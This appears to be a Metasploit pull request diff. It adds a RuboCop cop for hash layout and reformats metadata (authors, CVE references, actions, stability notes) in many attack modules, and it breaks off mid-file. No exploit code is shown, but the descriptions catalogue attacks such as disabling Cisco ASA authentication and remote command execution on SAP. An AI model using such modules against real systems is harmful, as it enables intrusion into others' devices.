### PR TITLE
Run rubocop layout rules on modules

### DIFF
--- a/.rubocop.yml
+++ b/.rubocop.yml
@@ -15,6 +15,7 @@ AllCops:
 
 require:
   - ./lib/rubocop/cop/layout/module_hash_on_new_line.rb
+  - ./lib/rubocop/cop/layout/module_hash_values_on_same_line.rb
   - ./lib/rubocop/cop/layout/module_description_indentation.rb
   - ./lib/rubocop/cop/layout/extra_spacing_with_bindata_ignored.rb
   - ./lib/rubocop/cop/lint/module_disclosure_date_format.rb
@@ -146,6 +147,9 @@ Style/SwapValues:
   Enabled: false
 
 Layout/ModuleHashOnNewLine:
+  Enabled: true
+
+Layout/ModuleHashValuesOnSameLine:
   Enabled: true
 
 Layout/ModuleDescriptionIndentation:

--- a/lib/rubocop/cop/layout/module_hash_values_on_same_line.rb
+++ b/lib/rubocop/cop/layout/module_hash_values_on_same_line.rb
@@ -1,0 +1,68 @@
+module RuboCop
+  module Cop
+    module Layout
+      class ModuleHashValuesOnSameLine < Base
+        extend AutoCorrector
+        include Alignment
+
+        MSG = "a hash value should open on the same line as its key"
+
+        def_node_matcher :find_update_info_node, <<~PATTERN
+          (def :initialize _args (begin (super $(send nil? {:update_info :merge_info} (lvar :info) (hash ...))) ...))
+        PATTERN
+
+        def_node_matcher :find_nested_update_info_node, <<~PATTERN
+          (def :initialize _args (super $(send nil? {:update_info :merge_info} (lvar :info) (hash ...)) ...))
+        PATTERN
+
+        def_node_matcher :find_kwargs_hash_node, <<~PATTERN
+          {
+            (def :initialize _args (begin (super $(hash ...) ...) ...) ...)
+            (def :initialize _args (super $(hash ...) ...) ...)
+          }
+        PATTERN
+
+        def on_def(node)
+          hash_node = find_hash_node(find_update_info_node(node) || find_nested_update_info_node(node)) || find_kwargs_hash_node(node)
+          return if hash_node.nil?
+
+          hash_node.pairs.each do |hash_pair|
+            if requires_correction?(hash_pair)
+              add_offense(hash_pair.value.location.begin, &autocorrector(hash_pair))
+            end
+          end
+        end
+
+        private
+
+        def find_hash_node(update_info_node)
+          return nil if update_info_node.nil?
+
+          hash_node = update_info_node.arguments.find { |argument| hash_arg?(argument) }
+          hash_node
+        end
+
+        def autocorrector(hash_pair)
+          lambda do |corrector|
+            key_offset = offset(hash_pair.key)
+            comment_nodes = processed_source.each_comment_in_lines(hash_pair.key.first_line..hash_pair.value.first_line).to_a
+            preceding_comments = comment_nodes.map { |comment| "#{comment.text}\n#{key_offset}" }.join
+
+            correction = "#{preceding_comments}#{hash_pair.key.source} #{hash_pair.delimiter} #{hash_pair.value.source}"
+            corrector.replace(hash_pair.source_range, correction)
+          end
+        end
+
+        def requires_correction?(hash_pair)
+          return false if hash_pair.single_line?
+
+          hash_pair.key.first_line != hash_pair.value.first_line
+        end
+
+        def hash_arg?(node)
+          node.type == :hash
+        end
+      end
+    end
+  end
+end

--- a/modules/auxiliary/admin/http/ibm_drm_download.rb
+++ b/modules/auxiliary/admin/http/ibm_drm_download.rb
@@ -24,23 +24,20 @@ class MetasploitModule < Msf::Auxiliary
           At the time of disclosure, this is was a 0 day, but IBM later patched it and released their advisory.
           Versions 2.0.2 to 2.0.4 are vulnerable, version 2.0.1 is not.
         },
-        'Author' =>
-          [
-            'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module
-          ],
+        'Author' => [
+          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module
+        ],
         'License' => MSF_LICENSE,
-        'DefaultOptions' =>
-          {
-            'SSL' => true
-          },
-        'References' =>
-          [
-            [ 'CVE', '2020-4427' ], # auth bypass
-            [ 'CVE', '2020-4429' ], # insecure default password
-            [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md' ],
-            [ 'URL', 'https://seclists.org/fulldisclosure/2020/Apr/33' ],
-            [ 'URL', 'https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-exist-in-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430/']
-          ],
+        'DefaultOptions' => {
+          'SSL' => true
+        },
+        'References' => [
+          [ 'CVE', '2020-4427' ], # auth bypass
+          [ 'CVE', '2020-4429' ], # insecure default password
+          [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md' ],
+          [ 'URL', 'https://seclists.org/fulldisclosure/2020/Apr/33' ],
+          [ 'URL', 'https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-exist-in-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430/']
+        ],
         'DisclosureDate' => '2020-04-21',
         'Actions' => [
           ['Download', { 'Description' => 'Download arbitrary file' }]

--- a/modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
+++ b/modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
@@ -33,28 +33,26 @@ class MetasploitModule < Msf::Auxiliary
           Radek Domanski).
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-        [
+        'Author' => [
           'Pedro Ribeiro <pedrib[at]gmail.com>', # Twitter: @pedrib1337. Vulnerability discovery and Metasploit module
           'Radek Domanski <radek.domanski[at]gmail.com>', # Twitter: @RabbitPro. Vulnerability discovery and Metasploit module
           'gwillcox-r7' # Minor general updates plus updated implementation of the check method to identify a wider range of vulnerable targets.
         ],
-        'References' =>
-          [
-            [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Tokyo_2019/tokyo_drift/tokyo_drift.md'],
-            [ 'URL', 'https://kb.netgear.com/000061982/Security-Advisory-for-Multiple-Vulnerabilities-on-Some-Routers-Mobile-Routers-Modems-Gateways-and-Extenders'],
-            [ 'CVE', '2020-10923'],
-            [ 'CVE', '2020-10924'],
-            [ 'ZDI', '20-703'],
-            [ 'ZDI', '20-704']
-          ],
-        'Notes' => # Note that reliability isn't included here, as technically the exploit can only
-            # only be run once, after which the service crashes.
-            {
-              'SideEffects' => [ CONFIG_CHANGES ], # This module will change the configuration by
-              # resetting the router to the default factory password.
-              'Stability' => [ CRASH_SERVICE_DOWN ] # This module will crash the target service after it is run.
-            },
+        'References' => [
+          [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Tokyo_2019/tokyo_drift/tokyo_drift.md'],
+          [ 'URL', 'https://kb.netgear.com/000061982/Security-Advisory-for-Multiple-Vulnerabilities-on-Some-Routers-Mobile-Routers-Modems-Gateways-and-Extenders'],
+          [ 'CVE', '2020-10923'],
+          [ 'CVE', '2020-10924'],
+          [ 'ZDI', '20-703'],
+          [ 'ZDI', '20-704']
+        ],
+        # Note that reliability isn't included here, as technically the exploit can only
+        # only be run once, after which the service crashes.
+        'Notes' => {
+          'SideEffects' => [ CONFIG_CHANGES ], # This module will change the configuration by
+          # resetting the router to the default factory password.
+          'Stability' => [ CRASH_SERVICE_DOWN ] # This module will crash the target service after it is run.
+        },
         'RelatedModules' => [ 'exploit/linux/telnet/netgear_telnetenable' ], # This module relies on users also running exploit/linux/telnet/netgear_telnetenable to get the shell.
         'DisclosureDate' => '2020-06-15',
         'DefaultTarget' => 0

--- a/modules/auxiliary/admin/http/netgear_r7000_backup_cgi_heap_overflow_rce.rb
+++ b/modules/auxiliary/admin/http/netgear_r7000_backup_cgi_heap_overflow_rce.rb
@@ -36,17 +36,15 @@ class MetasploitModule < Msf::Auxiliary
         'Targets' => [
           [ 'Netgear R7000 Firmware Version 1.0.11.116', {} ]
         ],
-        'Notes' =>
-          {
-            'Reliability' => [ REPEATABLE_SESSION ],
-            'Stability' => [ CRASH_SERVICE_DOWN ],
-            'SideEffects' => [ CONFIG_CHANGES ]
-          },
-        'References' =>
-          [
-            [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-netgear-nighthawk-r7000-httpd-preauth-rce/'],
-            [ 'CVE', '2021-31802']
-          ],
+        'Notes' => {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability' => [ CRASH_SERVICE_DOWN ],
+          'SideEffects' => [ CONFIG_CHANGES ]
+        },
+        'References' => [
+          [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-netgear-nighthawk-r7000-httpd-preauth-rce/'],
+          [ 'CVE', '2021-31802']
+        ],
         'DisclosureDate' => '2021-04-21'
       )
       )

--- a/modules/auxiliary/admin/http/tomcat_ghostcat.rb
+++ b/modules/auxiliary/admin/http/tomcat_ghostcat.rb
@@ -28,16 +28,14 @@ class MetasploitModule < Msf::Auxiliary
           It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes
           to their configurations.
         },
-        'Author' =>
-          [
-            'A Security Researcher of Chaitin Tech', # POC
-            'SunCSR Team' # Metasploit Module
-          ],
+        'Author' => [
+          'A Security Researcher of Chaitin Tech', # POC
+          'SunCSR Team' # Metasploit Module
+        ],
         'License' => MSF_LICENSE,
-        'References' =>
-          [
-            ['CVE', '2020-1938']
-          ],
+        'References' => [
+          ['CVE', '2020-1938']
+        ],
         'DisclosureDate' => '2020-02-20'
       )
     )

--- a/modules/auxiliary/admin/networking/cisco_asa_extrabacon.rb
+++ b/modules/auxiliary/admin/networking/cisco_asa_extrabacon.rb
@@ -16,29 +16,26 @@ class MetasploitModule < Msf::Auxiliary
           This module patches the authentication functions of a Cisco ASA
           to allow uncredentialed logins. Uses improved shellcode for payload.
         },
-      'Author' =>
-        [
-          'Sean Dillon <sean.dillon@risksense.com>',
-          'Zachary Harding <zachary.harding@risksense.com>',
-          'Nate Caroe <nate.caroe@risksense.com>',
-          'Dylan Davis <dylan.davis@risksense.com>',
-          'William Webb <william_webb[at]rapid7.com>', # initial module and ASA hacking notes
-          'Jeff Jarmoc <jjarmoc>', # minor improvements
-          'Equation Group',
-          'Shadow Brokers'
-        ],
-      'References' =>
-        [
-          [ 'CVE', '2016-6366'],
-          [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp'],
-          [ 'URL', 'https://github.com/RiskSense-Ops/CVE-2016-6366'],
-        ],
+      'Author' => [
+        'Sean Dillon <sean.dillon@risksense.com>',
+        'Zachary Harding <zachary.harding@risksense.com>',
+        'Nate Caroe <nate.caroe@risksense.com>',
+        'Dylan Davis <dylan.davis@risksense.com>',
+        'William Webb <william_webb[at]rapid7.com>', # initial module and ASA hacking notes
+        'Jeff Jarmoc <jjarmoc>', # minor improvements
+        'Equation Group',
+        'Shadow Brokers'
+      ],
+      'References' => [
+        [ 'CVE', '2016-6366'],
+        [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp'],
+        [ 'URL', 'https://github.com/RiskSense-Ops/CVE-2016-6366'],
+      ],
       'License' => MSF_LICENSE,
-      'Actions' =>
-        [
-          ['PASS_DISABLE', { 'Description' => 'Disable password authentication.' } ],
-          ['PASS_ENABLE', { 'Description' => 'Enable password authentication.' } ]
-        ],
+      'Actions' => [
+        ['PASS_DISABLE', { 'Description' => 'Disable password authentication.' } ],
+        ['PASS_ENABLE', { 'Description' => 'Enable password authentication.' } ]
+      ],
       'DefaultAction' => 'PASS_DISABLE',
       'Notes' => {
         'AKA' => ['EXTRABACON']

--- a/modules/auxiliary/admin/networking/cisco_dcnm_auth_bypass.rb
+++ b/modules/auxiliary/admin/networking/cisco_dcnm_auth_bypass.rb
@@ -26,11 +26,10 @@ class MetasploitModule < Msf::Auxiliary
           'MR_ME', # Amazing POC on www.exploit-db.com
           'Yann Castel (yann.castel[at]orange.com)' # Metasploit module
         ],
-        'References' =>
-          [
-            [ 'CVE', '2019-15975'],
-            [ 'EDB', '48018']
-          ],
+        'References' => [
+          [ 'CVE', '2019-15975'],
+          [ 'EDB', '48018']
+        ],
         'DisclosureDate' => '2020-06-01',
         'DefaultOptions' => { 'SSL' => true },
         'Notes' => {

--- a/modules/auxiliary/admin/networking/cisco_vpn_3000_ftp_bypass.rb
+++ b/modules/auxiliary/admin/networking/cisco_vpn_3000_ftp_bypass.rb
@@ -23,13 +23,12 @@ class MetasploitModule < Msf::Auxiliary
         },
         'Author'	=> [ 'aushack' ],
         'License'	=> MSF_LICENSE,
-        'References'	=>
-          [
-            [ 'BID', '19680' ],
-            [ 'CVE', '2006-4313' ],
-            [ 'OSVDB', '28139' ],
-            [ 'OSVDB', '28138' ]
-          ],
+        'References' => [
+          [ 'BID', '19680' ],
+          [ 'CVE', '2006-4313' ],
+          [ 'OSVDB', '28139' ],
+          [ 'OSVDB', '28138' ]
+        ],
         'DisclosureDate' => '2006-08-23'
       )
     )

--- a/modules/auxiliary/admin/networking/juniper_config.rb
+++ b/modules/auxiliary/admin/networking/juniper_config.rb
@@ -18,11 +18,10 @@ class MetasploitModule < Msf::Auxiliary
         },
         'License' => MSF_LICENSE,
         'Author' => ['h00die'],
-        'Actions' =>
-          [
-            ['JUNOS', { 'Description' => 'Import JunOS Config File' }],
-            ['SCREENOS', { 'Description' => 'Import ScreenOS Config File' }],
-          ],
+        'Actions' => [
+          ['JUNOS', { 'Description' => 'Import JunOS Config File' }],
+          ['SCREENOS', { 'Description' => 'Import ScreenOS Config File' }],
+        ],
         'DefaultAction' => 'JUNOS'
       )
     )

--- a/modules/auxiliary/admin/networking/mikrotik_config.rb
+++ b/modules/auxiliary/admin/networking/mikrotik_config.rb
@@ -16,11 +16,10 @@ class MetasploitModule < Msf::Auxiliary
         },
         'License' => MSF_LICENSE,
         'Author' => ['h00die'],
-        'Actions' =>
-          [
-            ['ROUTEROS', { 'Description' => 'Import RouterOS Config File' }],
-            ['SWOS', { 'Description' => 'Import SwOS Config File' }],
-          ],
+        'Actions' => [
+          ['ROUTEROS', { 'Description' => 'Import RouterOS Config File' }],
+          ['SWOS', { 'Description' => 'Import SwOS Config File' }],
+        ],
         'DefaultAction' => 'ROUTEROS'
       )
     )

--- a/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb
+++ b/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb
@@ -16,13 +16,12 @@ class MetasploitModule < Msf::Auxiliary
         info,
         'Name' => 'SAP Solution Manager remote unauthorized OS commands execution',
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Yvan Genuer', # @_1ggy The researcher who originally found this vulnerability
-            'Pablo Artuso', # @lmkalg The researcher who originally found this vulnerability
-            'Dmitry Chastuhin', # @chipik The researcher who made first PoC
-            'Vladimir Ivanov' # @_generic_human_ This Metasploit module
-          ],
+        'Author' => [
+          'Yvan Genuer', # @_1ggy The researcher who originally found this vulnerability
+          'Pablo Artuso', # @lmkalg The researcher who originally found this vulnerability
+          'Dmitry Chastuhin', # @chipik The researcher who made first PoC
+          'Vladimir Ivanov' # @_generic_human_ This Metasploit module
+        ],
         'Description' => %q{
           This module exploits the CVE-2020-6207 vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem) of
           SAP Solution Manager (SolMan) running version 7.2. The vulnerability occurs due to missing authentication
@@ -32,12 +31,11 @@ class MetasploitModule < Msf::Auxiliary
           Successful exploitation of the vulnerability enables unauthenticated remote attackers to achieve SSRF and execute OS commands from the agent connected
           to SolMan as a user from which the SMDAgent service starts, usually the daaadm.
         },
-        'References' =>
-          [
-            ['CVE', '2020-6207'],
-            ['URL', 'https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf'],
-            ['URL', 'https://github.com/chipik/SAP_EEM_CVE-2020-6207']
-          ],
+        'References' => [
+          ['CVE', '2020-6207'],
+          ['URL', 'https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf'],
+          ['URL', 'https://github.com/chipik/SAP_EEM_CVE-2020-6207']
+        ],
         'Actions' => [
           ['LIST', { 'Description' => 'List connected agents' }],
           ['SSRF', { 'Description' => 'Send SSRF from connected agent' }],

--- a/modules/auxiliary/client/telegram/send_message.rb
+++ b/modules/auxiliary/client/telegram/send_message.rb
@@ -15,11 +15,10 @@ class MetasploitModule < Msf::Auxiliary
         documentation for info on how to retrieve the bot token and corresponding chat
         ID values.
         },
-    'Author' =>
-      [
-        'Ege Balcı <egebalci[at]pm.me>', # Aka @egeblc of https://pentest.blog
-        'Gaurav Purswani' # @pingport80
-      ],
+    'Author' => [
+      'Ege Balcı <egebalci[at]pm.me>', # Aka @egeblc of https://pentest.blog
+      'Gaurav Purswani' # @pingport80
+    ],
     'License' => MSF_LICENSE,
     )
 

--- a/modules/auxiliary/dos/http/tautulli_shutdown_exec.rb
+++ b/modules/auxiliary/dos/http/tautulli_shutdown_exec.rb
@@ -12,8 +12,7 @@ class MetasploitModule < Msf::Auxiliary
       'Description' => 'Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the /shutdown URL.',
       'Author' => 'Ismail Tasdelen',
       'License' => MSF_LICENSE,
-      'References' =>
-      [
+      'References' => [
         ['CVE', '2019-19833'],
         ['EDB', '47785']
       ]

--- a/modules/auxiliary/gather/cve_2021_27850_apache_tapestry_hmac_key.rb
+++ b/modules/auxiliary/gather/cve_2021_27850_apache_tapestry_hmac_key.rb
@@ -24,10 +24,9 @@ class MetasploitModule < Msf::Auxiliary
           'Johannes Moritz', # CVE
           'Yann Castel (yann.castel[at]orange.com)' # Metasploit module
         ],
-        'References' =>
-          [
-            [ 'CVE', '2021-27850']
-          ],
+        'References' => [
+          [ 'CVE', '2021-27850']
+        ],
         'Notes' => {
           'Stability' => [ CRASH_SAFE ],
           'Reliability' => [ REPEATABLE_SESSION ],

--- a/modules/auxiliary/gather/peplink_bauth_sqli.rb
+++ b/modules/auxiliary/gather/peplink_bauth_sqli.rb
@@ -15,19 +15,17 @@ class MetasploitModule < Msf::Auxiliary
           By default, a session expires 4 hours after login (the setting can be changed by the admin), for this
           reason, the module attempts to retrieve the most recently created sessions.
         },
-        'Author' =>
-          [
-            'X41 D-Sec GmbH <info@x41-dsec.de>', # Original Advisory
-            'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>' # Metasploit module
-          ],
+        'Author' => [
+          'X41 D-Sec GmbH <info@x41-dsec.de>', # Original Advisory
+          'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>' # Metasploit module
+        ],
         'License' => MSF_LICENSE,
         'Platform' => %w[linux],
-        'References' =>
-          [
-            [ 'EDB', '42130' ],
-            [ 'CVE', '2017-8835' ],
-            [ 'URL', 'https://gist.github.com/red0xff/c4511d2f427efcb8b018534704e9607a' ]
-          ],
+        'References' => [
+          [ 'EDB', '42130' ],
+          [ 'CVE', '2017-8835' ],
+          [ 'URL', 'https://gist.github.com/red0xff/c4511d2f427efcb8b018534704e9607a' ]
+        ],
         'Targets' => [['Wildcard Target', {}]],
         'DefaultTarget' => 0
       )

--- a/modules/auxiliary/gather/shodan_host.rb
+++ b/modules/auxiliary/gather/shodan_host.rb
@@ -15,10 +15,9 @@ class MetasploitModule < Msf::Auxiliary
         },
         'Author' => [ 'natto97' ],
         'License' => MSF_LICENSE,
-        'References' =>
-          [
-            [ 'URL', 'https://honeyscore.shodan.io/']
-          ]
+        'References' => [
+          [ 'URL', 'https://honeyscore.shodan.io/']
+        ]
       )
     )
     register_options(

--- a/modules/auxiliary/gather/windows_secrets_dump.rb
+++ b/modules/auxiliary/gather/windows_secrets_dump.rb
@@ -33,13 +33,11 @@ class MetasploitModule < Msf::Auxiliary
           implement yet. It will be done in a next iteration.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-        [
+        'Author' => [
           'Alberto Solino', # Original Impacket code
           'Christophe De La Fuente', # MSf module
         ],
-        'References' =>
-        [
+        'References' => [
           ['URL', 'https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py'],
         ]
       )

--- a/modules/auxiliary/gather/zookeeper_info_disclosure.rb
+++ b/modules/auxiliary/gather/zookeeper_info_disclosure.rb
@@ -16,14 +16,12 @@ class MetasploitModule < Msf::Auxiliary
         'Description' => %q{
           Apache ZooKeeper server service runs on TCP 2181 and by default, it is accessible without any authentication. This module targets Apache ZooKeeper service instances to extract information about the system environment, and service statistics.
         },
-        'References' =>
-          [
-            ['URL', 'https://zooKeeper.apache.org/doc/current/zookeeperAdmin.html']
-          ],
-        'Author' =>
-          [
-            'Karn Ganeshen <KarnGaneshen[at]gmail.com>'
-          ],
+        'References' => [
+          ['URL', 'https://zooKeeper.apache.org/doc/current/zookeeperAdmin.html']
+        ],
+        'Author' => [
+          'Karn Ganeshen <KarnGaneshen[at]gmail.com>'
+        ],
         'DisclosureDate' => '2020-10-14',
         'License' => MSF_LICENSE,
         'DefaultOptions' => { 'VERBOSE' => true }

--- a/modules/auxiliary/scanner/http/apache_flink_jobmanager_traversal.rb
+++ b/modules/auxiliary/scanner/http/apache_flink_jobmanager_traversal.rb
@@ -22,22 +22,20 @@ class MetasploitModule < Msf::Auxiliary
           This module has been tested successfully on Apache Flink version 1.11.2
           on Ubuntu 18.04.4.
         },
-        'Author' =>
-          [
-            '0rich1 - Ant Security FG Lab', # Vulnerability discovery
-            'Hoa Nguyen - Suncsr Team', # Metasploit module
-            'bcoles', # Metasploit module cleanup and improvements
-          ],
+        'Author' => [
+          '0rich1 - Ant Security FG Lab', # Vulnerability discovery
+          'Hoa Nguyen - Suncsr Team', # Metasploit module
+          'bcoles', # Metasploit module cleanup and improvements
+        ],
         'License' => MSF_LICENSE,
-        'References' =>
-          [
-            ['CVE', '2020-17519'],
-            ['CWE', '22'],
-            ['EDB', '49398'],
-            ['PACKETSTORM', '160849'],
-            ['URL', 'http://www.openwall.com/lists/oss-security/2021/01/05/2'],
-            ['URL', 'https://www.tenable.com/cve/CVE-2020-17519']
-          ],
+        'References' => [
+          ['CVE', '2020-17519'],
+          ['CWE', '22'],
+          ['EDB', '49398'],
+          ['PACKETSTORM', '160849'],
+          ['URL', 'http://www.openwall.com/lists/oss-security/2021/01/05/2'],
+          ['URL', 'https://www.tenable.com/cve/CVE-2020-17519']
+        ],
         'DefaultOptions' => { 'RPORT' => 8081 },
         'DisclosureDate' => '2021-01-05'
       )

--- a/modules/auxiliary/scanner/http/emby_ssrf_scanner.rb
+++ b/modules/auxiliary/scanner/http/emby_ssrf_scanner.rb
@@ -19,11 +19,10 @@ class MetasploitModule < Msf::Auxiliary
       'License' => MSF_LICENSE,
       'Disclosure Date' => '2020-10-01',
       'RelatedModules' => ['auxiliary/scanner/http/emby_version_ssrf'],
-      'References' =>
-              [
-                ['CVE', '2020-26948'],
-                ['URL', 'https://github.com/btnz-k/emby_ssrf']
-              ]
+      'References' => [
+        ['CVE', '2020-26948'],
+        ['URL', 'https://github.com/btnz-k/emby_ssrf']
+      ]
     )
 
     deregister_options('VHOST', 'RPORT', 'SNAPLEN', 'SSL')

--- a/modules/auxiliary/scanner/http/emby_version_ssrf.rb
+++ b/modules/auxiliary/scanner/http/emby_version_ssrf.rb
@@ -18,11 +18,10 @@ class MetasploitModule < Msf::Auxiliary
       'License' => MSF_LICENSE,
       'Disclosure Date' => '2020-10-01',
       'RelatedModules' => ['auxiliary/scanner/http/emby_ssrf_scanner'],
-      'References' =>
-              [
-                ['CVE', '2020-26948'],
-                ['URL', 'https://github.com/btnz-k/emby_ssrf']
-              ]
+      'References' => [
+        ['CVE', '2020-26948'],
+        ['URL', 'https://github.com/btnz-k/emby_ssrf']
+      ]
     )
 
     register_options(

--- a/modules/auxiliary/scanner/http/fortimail_login_bypass_detection.rb
+++ b/modules/auxiliary/scanner/http/fortimail_login_bypass_detection.rb
@@ -20,12 +20,11 @@ class MetasploitModule < Msf::Auxiliary
         'Juerg Schweingruber <juerg.schweingruber[at]redguard.ch>', # Vulnerability Re-Discovery
         'Patrick Schmid <patrick.schmid[at]redguard.ch>' # Exploit Development & MSF module
       ],
-      'References' =>
-        [
-          ['CVE', '2020-9294'],
-          ['URL', 'https://fortiguard.com/psirt/FG-IR-20-045'],
-          ['URL', 'https://www.redguard.ch/blog/2020/07/02/fortimail-unauthenticated-login-bypass/']
-        ],
+      'References' => [
+        ['CVE', '2020-9294'],
+        ['URL', 'https://fortiguard.com/psirt/FG-IR-20-045'],
+        ['URL', 'https://www.redguard.ch/blog/2020/07/02/fortimail-unauthenticated-login-bypass/']
+      ],
       'License' => MSF_LICENSE
     )
 

--- a/modules/auxiliary/scanner/http/limesurvey_zip_traversals.rb
+++ b/modules/auxiliary/scanner/http/limesurvey_zip_traversals.rb
@@ -26,25 +26,23 @@ class MetasploitModule < Msf::Auxiliary
           3.0.0-171222, and 2.70.0-170921.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'h00die', # msf module
-            'Matthew Aberegg', # edb/discovery cve 2020
-            'Michael Burkey', # edb/discovery cve 2020
-            'Federico Fernandez', # cve 2019
-            'Alejandro Parodi' # credited in cve 2019 writeup
-          ],
-        'References' =>
-          [
-            # CVE-2020-11455
-            ['EDB', '48297'], # CVE-2020-11455
-            ['CVE', '2020-11455'],
-            ['URL', 'https://github.com/LimeSurvey/LimeSurvey/commit/daf50ebb16574badfb7ae0b8526ddc5871378f1b'],
-            # CVE-2019-9960
-            ['CVE', '2019-9960'],
-            ['URL', 'https://www.secsignal.org/en/news/cve-2019-9960-arbitrary-file-download-in-limesurvey/'],
-            ['URL', 'https://github.com/LimeSurvey/LimeSurvey/commit/1ed10d3c423187712b8f6a8cb2bc9d5cc3b2deb8']
-          ],
+        'Author' => [
+          'h00die', # msf module
+          'Matthew Aberegg', # edb/discovery cve 2020
+          'Michael Burkey', # edb/discovery cve 2020
+          'Federico Fernandez', # cve 2019
+          'Alejandro Parodi' # credited in cve 2019 writeup
+        ],
+        'References' => [
+          # CVE-2020-11455
+          ['EDB', '48297'], # CVE-2020-11455
+          ['CVE', '2020-11455'],
+          ['URL', 'https://github.com/LimeSurvey/LimeSurvey/commit/daf50ebb16574badfb7ae0b8526ddc5871378f1b'],
+          # CVE-2019-9960
+          ['CVE', '2019-9960'],
+          ['URL', 'https://www.secsignal.org/en/news/cve-2019-9960-arbitrary-file-download-in-limesurvey/'],
+          ['URL', 'https://github.com/LimeSurvey/LimeSurvey/commit/1ed10d3c423187712b8f6a8cb2bc9d5cc3b2deb8']
+        ],
         'DisclosureDate' => '2020-04-02'
       )
     )

--- a/modules/auxiliary/scanner/http/nagios_xi_scanner.rb
+++ b/modules/auxiliary/scanner/http/nagios_xi_scanner.rb
@@ -23,13 +23,12 @@ class MetasploitModule < Msf::Auxiliary
       },
       'Author' => [ 'Erik Wynter' ], # @wyntererik
       'License' => MSF_LICENSE,
-      'References' =>
-        [
-          ['CVE', '2019-15949'],
-          ['CVE', '2020-5791'],
-          ['CVE', '2020-5792'],
-          ['CVE', '2020-35578']
-        ]
+      'References' => [
+        ['CVE', '2019-15949'],
+        ['CVE', '2020-5791'],
+        ['CVE', '2020-5792'],
+        ['CVE', '2020-35578']
+      ]
     )
     register_options [
       OptString.new('VERSION', [false, 'Nagios XI version to check against existing exploit modules', nil])

--- a/modules/auxiliary/scanner/http/springcloud_directory_traversal.rb
+++ b/modules/auxiliary/scanner/http/springcloud_directory_traversal.rb
@@ -19,18 +19,16 @@ class MetasploitModule < Msf::Auxiliary
           2.1.x prior to 2.1.9, and older unsupported versions. Spring
           Cloud Config listens by default on port 8888.
         },
-        'References' =>
-          [
-            ['CVE', '2020-5410'],
-            ['URL', 'https://tanzu.vmware.com/security/cve-2020-5410'],
-            ['URL', 'https://xz.aliyun.com/t/7877']
-          ],
-        'Author' =>
-          [
-            'Fei Lu', # Vulnerability discovery
-            'bfpiaoran@qq.com', # Vulnerability discovery
-            'Dhiraj Mishra' # Metasploit module
-          ],
+        'References' => [
+          ['CVE', '2020-5410'],
+          ['URL', 'https://tanzu.vmware.com/security/cve-2020-5410'],
+          ['URL', 'https://xz.aliyun.com/t/7877']
+        ],
+        'Author' => [
+          'Fei Lu', # Vulnerability discovery
+          'bfpiaoran@qq.com', # Vulnerability discovery
+          'Dhiraj Mishra' # Metasploit module
+        ],
         'DisclosureDate' => '2020-06-01',
         'License' => MSF_LICENSE
       )

--- a/modules/auxiliary/scanner/http/synology_forget_passwd_user_enum.rb
+++ b/modules/auxiliary/scanner/http/synology_forget_passwd_user_enum.rb
@@ -31,12 +31,11 @@ class MetasploitModule < Msf::Auxiliary
           'Steve Kaun' # POC
         ],
         'License' => MSF_LICENSE,
-        'References' =>
-          [
-            [ 'EDB', '43455' ],
-            [ 'CVE', '2017-9554' ],
-            [ 'URL', 'https://www.synology.com/en-global/security/advisory/Synology_SA_17_29_DSM' ]
-          ],
+        'References' => [
+          [ 'EDB', '43455' ],
+          [ 'CVE', '2017-9554' ],
+          [ 'URL', 'https://www.synology.com/en-global/security/advisory/Synology_SA_17_29_DSM' ]
+        ],
         'DisclosureDate' => '2011-01-05'
       )
     )

--- a/modules/auxiliary/scanner/http/wp_abandoned_cart_sqli.rb
+++ b/modules/auxiliary/scanner/http/wp_abandoned_cart_sqli.rb
@@ -22,18 +22,16 @@ class MetasploitModule < Msf::Auxiliary
           wp_woocommerce_session cookie is required, which has at least one item in the
           cart.
         },
-        'Author' =>
-          [
-            'h00die', # msf module
-            'WPDeeply', # Discovery and PoC
-          ],
+        'Author' => [
+          'h00die', # msf module
+          'WPDeeply', # Discovery and PoC
+        ],
         'License' => MSF_LICENSE,
-        'References' =>
-          [
-            ['WPVDB', '10461'],
-            ['URL', 'https://wpdeeply.com/woocommerce-abandoned-cart-before-5-8-2-sql-injection/'],
-            ['URL', 'https://plugins.trac.wordpress.org/changeset/2413885']
-          ],
+        'References' => [
+          ['WPVDB', '10461'],
+          ['URL', 'https://wpdeeply.com/woocommerce-abandoned-cart-before-5-8-2-sql-injection/'],
